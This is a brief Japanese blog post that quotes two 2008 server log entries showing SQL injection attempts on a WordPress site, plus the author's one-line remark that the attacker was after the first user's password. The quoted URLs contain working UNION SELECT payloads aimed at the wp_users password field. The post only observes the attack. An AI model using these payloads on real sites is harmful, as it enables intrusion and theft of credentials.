まとまりのないブログ

something which something is something

sql Tips wordpress

sqlインジェクション

投稿日:

ns.km22518.keymachine.de - - [19/Jul/2008:22:25:12 +0900] "GET /wordpress/index.php?cat=%27+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1" 200 14883 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
ns.km22518.keymachine.de - - [19/Jul/2008:22:25:14 +0900] "GET /wordpress/index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1" 200 14877 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"

パスワードを割り出そうとしているのか。wordpressのユーザidの1番目のパスワードをselectで取得しようとしているのがログから読み取れる。

-sql, Tips, wordpress

執筆者:


comment

メールアドレスが公開されることはありません。

日本語が含まれない投稿は無視されますのでご注意ください。(スパム対策)

関連記事

no image

2.5インチ IDE HDD の規格

2.5インチのハードディスクドライブの規格の詳細について。サンプル画像のモデルはHITACHIのTravelstar 20GB。昔のノートパソコンで使われているタイプ。IDE接続、パラレルインターフェ …

no image

海外通販サイトPimoroniで注文した

ラズベリーパイなど電子機器を販売しているイギリスの通販サイトpimoroniで注文した商品が届いた。注文した時に発送方法を選ぶことができ、一番安いのは追跡無しのRoyalMailというやつでその次がそ …

no image

サーバーを監視するサーバーを立てることをダラダラ考えてみる

今現在のところ私はサーバーを複数台稼働させているのだけれど、数が増えてくると手間がかかるため一台一台順調に動いているかどうかチェックするのが煩わしくなってくる。そこで、その問題を解消するために、サーバ …

no image

flashpaperを使ってwordをpdfに出力できない

http://oshiete1.goo.ne.jp/qa3056850.html 僕も昔同じような状況になったことがあります。 僕の場合、アメリカのAdobeサイトからFlashPaper2の体験版( …

no image

tensorflow 1.5 をインストールしようとしてみたが断念

最新のtensorflowのバージョンは現在のところ2.4がリリースされているが、バージョン1.6以降のtensorflowはAVX(Advanced Vector Extensions)をサポートし …